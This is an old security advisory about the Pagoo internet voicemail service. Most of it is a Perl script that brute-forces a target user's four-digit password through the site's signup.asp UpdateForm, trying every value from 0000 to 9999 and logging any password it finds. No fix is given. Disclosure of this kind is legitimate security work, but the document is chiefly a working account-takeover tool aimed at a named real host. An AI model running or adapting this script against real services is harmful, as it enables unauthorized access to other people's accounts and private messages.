COMMAND

    Pagoo (Pagoo Internet voice MailBox)

SYSTEMS AFFECTED

    Those using Pagoo

PROBLEM

    Elaich  Of  Hhp  posted   following  Pagoo  VMB  remote   exploit.
    This exploit will  extract the password  to the specified  PagooID
    you specify.  The vulnerability  comes into play when you  connect
    to your  UpdateForm thru  signup.asp which  requires your  PagooID
    and  your  4  digit  password.   Nothing  will  prevent  you  from
    reconnecting and trying a new password from 0000 in increments  of
    1 till  we reach  9999 which  is the  highest password possible...
    Exploit follows:

    #!/usr/bin/perl
    #
    #       (hhp) hhp-pagoo.pl (hhp)
    #        by: elaich of the hhp.
    #         http://hhp.hemp.net/
    #                 '99'
    #
    # Logs passwds to file: pagooids

    use IO::Socket;

    die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
    ($box) = (@ARGV);

    open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
    autoflush OUT 1;

    $host = "www.pagoo.com";
    autoflush STDOUT 1;

    sub parse
     {
      ($num) = @_;
      $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";

      $socket = IO::Socket::INET->new(PeerAddr => $host,
                                      PeerPort => 80,
                                         Proto => "tcp") or die "Can't connect.\n";

      print $socket "GET $url\n";
      print "Trying password: $num of 9999.\n";
      while(<$socket>)
       {
            chomp;
            if(/Password invalid/)
             {
             break;
             }
            if(/First Name/)
             {
              print "PagooID password extracted...\n";
              print "PagooID: $box / Password: $num\n";
              print OUT "PagooID: $box / Password: $num\n";
              exit 0;
             }

        }
     }
    $num = '0000';
    parse $num;

    for($i = 0; $i <= 9999; $i++)
     {
      $num++;
      parse $num;
     }

SOLUTION

    Nothing yet.